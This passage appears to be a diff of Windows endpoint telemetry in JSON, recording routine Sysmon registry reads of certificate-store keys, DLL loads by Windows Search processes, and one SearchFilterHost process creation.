"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\SearchFilterHost.exe\" 0 744 748 756 8192 752 ", - "event_type": "process", - "logon_id": 999, - "parent_process_name": 
"SearchIndexer.exe", - "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", - "pid": 6608, - "ppid": 5824, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "subtype": "create", - "timestamp": 131883570916229984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}", - "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6608, - 
"process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": 
"gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915900000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
